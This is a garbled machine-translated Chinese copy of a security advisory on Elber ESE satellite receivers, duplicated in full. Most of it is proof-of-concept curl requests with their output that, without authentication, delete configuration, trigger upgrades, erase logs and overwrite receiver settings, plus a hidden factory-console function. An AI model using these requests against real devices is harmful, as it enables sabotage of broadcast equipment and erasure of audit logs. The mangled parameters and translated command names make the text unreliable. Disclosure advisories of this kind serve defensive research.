Elber ESE DVB-S/S2卫星接收器1.5.x设备配置
Vendor: Elber S.R.L.
产品网页: https://www.elber.it
受影响的版本: 1.5.179修订904
1.5.56修订884
1.229修订440
摘要: ESE(Elber卫星设备)产品线,专为
高端无线电贡献和分销市场,质量和质量
可靠性是最重要的。 Elber IRD(集成的接收器解码器)
ESE-01在
优异的质量/价格比。数字卫星贡献的发展
网络和连接大量站点的需求需要便宜
但是可靠且执行的卫星接收器与集成解码器。
DESC:该设备患有未经验证的设备配置,并且
客户端隐藏功能披露。
在: NBFM控制器上测试
头脑/IP
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2024-5821
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/zsl-2024-5821.php
18.08.2023
- -
#配置风扇
$ curl'http://target/json_data/fan?fan_speed=fan_target=warn_temp=alarm_temp='
应用配置
#删除配置
$ curl'http://target/json_data/conf_cmd?index=4cmd=2'
文件删除成功
#启动升级
$ curl'http://target/json_data/conf_cmd?index=4cmd=1'
升级成功启动
#日志擦除
$ curl'http://target/json_data/erase_log.js?直到=-2'
原木被删除
#直到:
#=0全部
#=-2昨天
#=-8上周
#=-15最近两个星期
#=-22最近三周
#=-31上个月
#设置Rx配置
$卷发'http://target/json_data/nbfmv2rx.setConfig?freq=2480000freq_offset=0mute=1sq_thresh=-90.0dec mode=0lr_swap=0preemph=0preemph_const=0deemph=0deemph_const=1CH_LR_ENABLE=0CH_R_GAIN=0.0CH l_gain=0.0CH_ADJ_CTRL=0CH_LR_ATT=1MPXDIG_ATT=0PILOT_TRIM=0.0MPXDIG_GAIN=0.0RDS_TRIM=0.0DEL ay_enable=0local_rds=0output_delay=0pi_code=0 _ mpx1_enable=1Mpx2_enable=1sca1_enable=1sca2_ enable=0MPX1_ATT=0MPX2_ATT=0SCA1_ATT=0SCA2_ATT=0MPX1_GAIN=0.0MPX2_GAIN=0.0SCA1_GAIN=0.0SCA2 _gain=0.0limiter_enable=falselim_1_gain=0.0+dblim_1_th=0.0+khzlim_1_alpha=0.0+%+%25setuptime=0 .0+msholdTime=0.0+msrelease -factor=0.0+db%2fSeclim_2_en=falselim_2_gain=0.0+dblim_2_th=0.0+k hzrds_gen=falsert_pi=rt_ps=rt_plus_en=falsert_line_a=rt_line_b=rt_af=rf_trap=0output_trap=0''
RX配置成功应用
#显示工厂窗口和FPGA上传(控制台)
cleber_show_factory_wnd()
# ETC。
Vendor: Elber S.R.L.
产品网页: https://www.elber.it
受影响的版本: 1.5.179修订904
1.5.56修订884
1.229修订440
摘要: ESE(Elber卫星设备)产品线,专为
高端无线电贡献和分销市场,质量和质量
可靠性是最重要的。 Elber IRD(集成的接收器解码器)
ESE-01在
优异的质量/价格比。数字卫星贡献的发展
网络和连接大量站点的需求需要便宜
但是可靠且执行的卫星接收器与集成解码器。
DESC:该设备患有未经验证的设备配置,并且
客户端隐藏功能披露。
在: NBFM控制器上测试
头脑/IP
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2024-5821
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/zsl-2024-5821.php
18.08.2023
- -
#配置风扇
$ curl'http://target/json_data/fan?fan_speed=fan_target=warn_temp=alarm_temp='
应用配置
#删除配置
$ curl'http://target/json_data/conf_cmd?index=4cmd=2'
文件删除成功
#启动升级
$ curl'http://target/json_data/conf_cmd?index=4cmd=1'
升级成功启动
#日志擦除
$ curl'http://target/json_data/erase_log.js?直到=-2'
原木被删除
#直到:
#=0全部
#=-2昨天
#=-8上周
#=-15最近两个星期
#=-22最近三周
#=-31上个月
#设置Rx配置
$卷发'http://target/json_data/nbfmv2rx.setConfig?freq=2480000freq_offset=0mute=1sq_thresh=-90.0dec mode=0lr_swap=0preemph=0preemph_const=0deemph=0deemph_const=1CH_LR_ENABLE=0CH_R_GAIN=0.0CH l_gain=0.0CH_ADJ_CTRL=0CH_LR_ATT=1MPXDIG_ATT=0PILOT_TRIM=0.0MPXDIG_GAIN=0.0RDS_TRIM=0.0DEL ay_enable=0local_rds=0output_delay=0pi_code=0 _ mpx1_enable=1Mpx2_enable=1sca1_enable=1sca2_ enable=0MPX1_ATT=0MPX2_ATT=0SCA1_ATT=0SCA2_ATT=0MPX1_GAIN=0.0MPX2_GAIN=0.0SCA1_GAIN=0.0SCA2 _gain=0.0limiter_enable=falselim_1_gain=0.0+dblim_1_th=0.0+khzlim_1_alpha=0.0+%+%25setuptime=0 .0+msholdTime=0.0+msrelease -factor=0.0+db%2fSeclim_2_en=falselim_2_gain=0.0+dblim_2_th=0.0+k hzrds_gen=falsert_pi=rt_ps=rt_plus_en=falsert_line_a=rt_line_b=rt_af=rf_trap=0output_trap=0''
RX配置成功应用
#显示工厂窗口和FPGA上传(控制台)
cleber_show_factory_wnd()
# ETC。